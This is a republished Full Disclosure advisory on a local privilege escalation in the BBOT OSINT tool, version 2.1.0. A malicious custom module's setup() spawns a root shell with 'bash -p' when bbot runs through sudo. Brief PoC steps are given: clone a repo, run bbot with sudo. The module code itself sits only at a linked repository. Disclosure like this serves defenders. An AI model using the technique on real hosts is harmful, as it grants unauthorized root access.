BBOT 2.1.0 - Local Privilege Escalation via Malicious Module Execution
文章描述了BBOT 2.1.0版本中存在一个本地权限提升漏洞,当配置为sudo可执行时,恶意模块可通过`setup()`函数获取更高权限。该漏洞利用了BBOT执行自定义Python模块的功能,在特定条件下可实现特权 escalation。 2025-4-24 03:14:16 Author: seclists.org(查看原文) 阅读量:5 收藏
fulldisclosure logo

Full Disclosure mailing list archives

From: Housma mardini <housma () gmail com>
Date: Fri, 18 Apr 2025 16:12:49 +0400
Hi Full Disclosure,

I'd like to share a local privilege escalation technique involving BBOT
(Bighuge BLS OSINT Tool) when misconfigured with sudo access.

---

Exploit Title: BBOT 2.1.0 - Local Privilege Escalation via Malicious Module
Execution
Date: 2025-04-16
Exploit Author: Huseyin Mardinli
Vendor Homepage: https://github.com/blacklanternsecurity/bbot
Version: 2.1.0.4939rc (tested)
Tested on: Kali Linux Rolling (2025.1)
CVE: N/A
Platform: Linux
Type: Local

### Description:

BBOT allows execution of custom Python modules during OSINT scans. When
configured as a sudo-executable (e.g., via NOPASSWD), a malicious module
can escalate privileges via the `setup()` function.

### PoC Steps:

1. Clone:
   git clone https://github.com/Housma/bbot-privesc.git

2. Run with sudo:
   sudo /usr/local/bin/bbot -t dummy.com -p preset.yml --event-types ROOT

3. A root shell is spawned via `bash -p` from within the module.

### GitHub (Full Write-up + PoC):
https://github.com/Housma/bbot-privesc

---

This exploit highlights how trusted open-source tools can be abused in
real-world environments.

Regards,
Huseyin Mardinli
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

  • BBOT 2.1.0 - Local Privilege Escalation via Malicious Module Execution Housma mardini (Apr 23)

文章来源: https://seclists.org/fulldisclosure/2025/Apr/19
如有侵权请联系:admin#unsafe.sh